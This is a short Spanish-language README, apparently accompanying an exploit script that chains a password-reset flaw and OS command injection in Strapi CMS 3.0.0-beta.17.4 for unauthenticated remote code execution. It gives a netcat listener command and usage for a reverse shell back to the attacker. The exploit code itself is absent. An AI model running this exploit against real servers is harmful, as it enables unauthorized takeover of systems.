
Strapi CMS 3.0.0-beta.17.4 - Ejecución remota de código sin autenticación (CVE-2019-18818, CVE-2019-19609)
Este exploit se dirige a dos vulnerabilidades en la versión 3.0.0-beta-17.4 del framework Strapi CMS, permitiendo la ejecución remota de código (RCE) sin autenticación.
Mecanismo débil de recuperación de contraseña para contraseña olvidada
CVSS: 9.8 - Crítico
Más detalles: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
Neutralización incorrecta de elementos especiales utilizados en un comando del sistema operativo ('Inyección de comandos del sistema operativo')
CVSS: 7.2 - Alto
Más detalles: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
Antes de ejecutar este exploit, inicie un listener de netcat en el lport que especifique en las siguientes opciones.
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>